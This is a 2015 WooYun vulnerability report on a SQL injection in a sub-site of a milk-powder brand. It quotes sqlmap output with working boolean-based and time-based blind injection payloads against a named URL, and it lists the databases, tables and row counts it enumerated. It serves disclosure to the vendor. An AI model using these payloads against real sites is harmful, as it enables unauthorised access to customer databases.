当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156506

漏洞标题:明一奶粉某分站SQL注入全站数据泄漏

相关厂商:wissun.com

漏洞作者: 花式

提交时间:2015-11-29 22:24

修复时间:2015-12-04 22:26

公开时间:2015-12-04 22:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-29: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

vip.wissun.com/?杨静178


伪静态

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://vip.wissun.com:80/?杨静178') AND 3881=3881 AND ('Ovso'='Ovso
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://vip.wissun.com:80/?杨静178') AND (SELECT * FROM (SELECT(SLEE
P(5)))SdaV) AND ('fuif'='fuif
---
[01:50:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[01:50:25] [INFO] fetching database names
[01:50:25] [INFO] fetching number of databases
[01:50:25] [INFO] resumed: 3
[01:50:25] [INFO] resumed: information_schema
[01:50:25] [INFO] resumed: test
[01:50:25] [INFO] resumed: vip_wissun_com
available databases [3]:
[*] information_schema
[*] test
[*] vip_wissun_com


漏洞证明:

Database: vip_wissun_com
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| vip_credit                      | 2628490 |
| vip_content                     | 1135353 |
| vip_wechat_request              | 1118717 |
| vip_friend                      | 889706  |
| vip_content_his                 | 668929  |
| vip_gradeupdate                 | 582904  |
| vip_content_mention             | 562462  |
| vip_dailytasks                  | 555118  |
| vip_credit_log                  | 379197  |
| vip_content_topic               | 342535  |
| vip_comments                    | 315409  |
| vip_credit_copy1                | 309873  |
| vip_grademention                | 245208  |
| vip_logindt                     | 187833  |
| vip_mmslog_2013                 | 105746  |
| vip_wechat_userinfo             | 71864   |
| vip_store                       | 66529   |
| vip_mytopic                     | 53606   |
| vip_mmslog                      | 43226   |
| vip_friend_credit_log           | 37532   |
| vip_users                       | 33178   |
| vip_interface_log               | 29313   |
| vip_atusers                     | 29146   |
| vip_regip                       | 27512   |
| vip_wechat_mass                 | 26131   |
| vip_activity_new_year_gate      | 26009   |
| vip_mother_likes                | 19983   |
| vip_1111_winner                 | 18774   |
| vip_1111_weibo                  | 17202   |
| vip_activity_goodstart          | 14902   |
| vip_activity_wish_comment       | 13121   |
| vip_messages                    | 10803   |
| vip_credit_copy                 | 10791   |
| vip_url                         | 9049    |
| vip_babyshow_vote               | 8156    |
| vip_2014_praise                 | 7969    |
| vip_activity_brand              | 7929    |
| vip_wechat_car_log              | 7565    |
| vip_circle_user_link            | 7005    |
| star_lm                         | 6427    |
| vip_activity_brand_invite       | 6270    |
| vip_activity_start2015          | 6226    |
| vip_wechat_car_sales            | 6169    |
| vip_faq                         | 5791    |
| vip_praise                      | 5536    |
| vip_loginbind                   | 5439    |
| vip_2014_gift                   | 4775    |
| star_llm                        | 4756    |
| vip_userscalls                  | 4667    |
| star_tm                         | 4524    |
| vip_activity_wheel_log          | 3897    |
| vip_city                        | 3532    |
| vip_region                      | 3408    |
| vip_wechat_car_gift_log         | 3402    |
| vip_train_share                 | 3296    |
| vip_activity_new_year_invite    | 2710    |
| vip_activity_ysy                | 2382    |
| vip_content_queue               | 2316    |
| vip_ips                         | 2172    |
| vip_activity_wish               | 2163    |
| vip_tongji                      | 1965    |
| vip_mobile_log                  | 1807    |
| vip_favorite                    | 1749    |
| vip_credit_ticket               | 1698    |
| vip_activity_new_year_winner    | 1648    |
| vip_activity_new_year_gift      | 1598    |
| vip_usertags                    | 1534    |
| vip_credit_orders               | 1515    |
| vip_order_item                  | 1366    |
| vip_credit_orders_analysis      | 1358    |
| vip_order                       | 1320    |
| vip_activity_wish_praise        | 1257    |
| vip_semobile                    | 1234    |
| vip_order_item_2013             | 1226    |
| vip_article                     | 1186    |
| vip_order_2013                  | 1123    |
| vip_mother_images_success       | 1043    |
| vip_activity_new_year_ip        | 1012    |
| vip_act_cqfs                    | 822     |
| vip_groupuids                   | 819     |
| vip_baby                        | 722     |
| vip_delivery                    | 722     |
| vip_article_relate_links        | 647     |
| vip_pregnancy_chapterinfo       | 602     |
| vip_apply_2013                  | 572     |
| vip_district                    | 566     |
| vip_baby_curve                  | 531     |
| vip_mother_vote_invite          | 515     |
| vip_mother_vote_item            | 511     |
| vip_circle_apply                | 501     |
| vip_train_lottery               | 475     |
| vip_activity_new_wheel          | 467     |
| vip_credit_orders_log           | 415     |
| vip_2014_fz_public              | 384     |
| vip_2014_fz_public_             | 382     |
| vip_apply                       | 340     |
| vip_2014_fz_public__            | 337     |
| vip_2014_photo                  | 334     |
| vip_pregnancy_daydatamore       | 332     |
| vip_topic                       | 328     |
| vip_2015_read_manage            | 327     |
| vip_1111_invite                 | 305     |
| vip_mother_comment              | 304     |
| vip_product                     | 301     |
| vip_pregnancy_everyday_question | 282     |
| vip_pregnancy_daydata           | 280     |
| vip_pregnancy_daytip            | 280     |
| vip_credit_orders_batch         | 278     |
| vip_activity_find_chance        | 263     |
| vip_activity_wheelm             | 250     |
| vip_jz_user                     | 249     |
| vip_activity_find_lottery       | 248     |
| vip_medal_user_link             | 246     |
| vip_pregnancy_chaptertitle      | 240     |
| vip_verified                    | 222     |
| vip_save_yuedu                  | 220     |
| vip_activity_wish_content       | 219     |
| vip_2014_family                 | 208     |
| vip_1111_wechat_log             | 206     |
| vip_activity_wish_lottory       | 202     |
| vip_mother_material             | 185     |
| vip_tags                        | 181     |
| vip_voteusers                   | 179     |
| vip_cart                        | 176     |
| vip_edus                        | 166     |
| vip_delivery_2013               | 165     |
| vip_activity_find_mother        | 154     |
| vip_wechat_cart_sn_log          | 135     |
| vip_babyshow_photo              | 132     |
| vip_pregnancy_productdetial     | 131     |
| vip_adminmenu                   | 128     |
| vip_voteoptions                 | 126     |
| vip_wechat_qrcode               | 126     |
| vip_wechat_shake                | 119     |
| vip_2014_cq_family              | 113     |
| vip_clicks                      | 102     |
| vip_groups                      | 96      |
| vip_careers                     | 94      |
| vip_1111_wechat                 | 85      |
| vip_system                      | 79      |
| vip_trial_report_2013           | 77      |
| vip_cart_2013                   | 76      |
| vip_prize                       | 76      |
| vip_article_category            | 67      |
| vip_emotions                    | 67      |
| vip_activity                    | 65      |
| vip_xb_reg                      | 65      |
| vip_activity_wheel              | 63      |
| vip_report_2013                 | 59      |
| vip_faq_praise                  | 57      |
| vip_mmsdraw                     | 55      |
| vip_wechat_lottery              | 52      |
| vip_activity_yearstar           | 51      |
| vip_credit_rule_2013            | 50      |
| vip_wechat_news                 | 50      |
| vip_dealer                      | 47      |
| vip_prize_invoicing             | 43      |
| vip_trial_report                | 43      |
| vip_pregnancy_weekdata          | 40      |
| vip_convert                     | 38      |
| vip_wechat_shake_copy           | 37      |
| vip_prize_2013                  | 36      |
| vip_convert_2013                | 35      |
| vip_credit_rule                 | 34      |
| vip_topicwidget                 | 33      |
| vip_wechat_car_supervisor       | 33      |
| vip_convert_user                | 28      |
| vip_votes                       | 17      |
| vip_activity_homecoming         | 16      |
| vip_mother_user_material        | 15      |
| vip_pregnancy_chapter           | 13      |
| vip_mmsdraw_winner              | 12      |
| vip_faq_stores                  | 11      |
| vip_play                        | 11      |
| vip_trial_2013                  | 11      |
| vip_usersmms                    | 11      |
| vip_banner                      | 10      |
| vip_prize_rule                  | 10      |
| vip_2014_cq_public              | 9       |
| vip_blocklist                   | 9       |
| vip_engines                     | 9       |
| vip_links                       | 9       |
| vip_mobile_icon                 | 9       |
| vip_users_unbind                | 9       |
| vip_admingroup                  | 8       |
| vip_medal                       | 8       |
| vip_2014_prize                  | 7       |
| vip_mother_material_category    | 7       |
| vip_votecomment                 | 7       |
| vip_wechat_car_prize            | 7       |
| vip_motherbroad                 | 6       |
| vip_tools                       | 6       |
| vip_trial                       | 6       |
| vip_babyshow_choiceness         | 5       |
| vip_circle                      | 5       |
| vip_expert                      | 5       |
| vip_mother_material_vote        | 5       |
| vip_wap_nav                     | 5       |
| vip_wap_pages                   | 5       |
| vip_yuedu_login                 | 4       |
| vip_babyshow_activity           | 3       |
| vip_game_category               | 3       |
| vip_mobile_banner               | 3       |
| vip_music_category              | 3       |
| vip_vipgroup                    | 3       |
| vip_wap_banner                  | 3       |
| vip_blacklist                   | 2       |
| vip_credit_orders_scheme        | 2       |
| vip_notice                      | 2       |
| vip_plugins                     | 2       |
| vip_wechat_car_chance           | 2       |
| vip_report                      | 1       |
+---------------------------------+---------+


1.png


不深入

修复方案:

版权声明:转载请注明来源 花式@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-04 22:26

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

2015-12-29:非常感谢您的关注,我们已经把漏洞给修复了

漏洞评价:

评价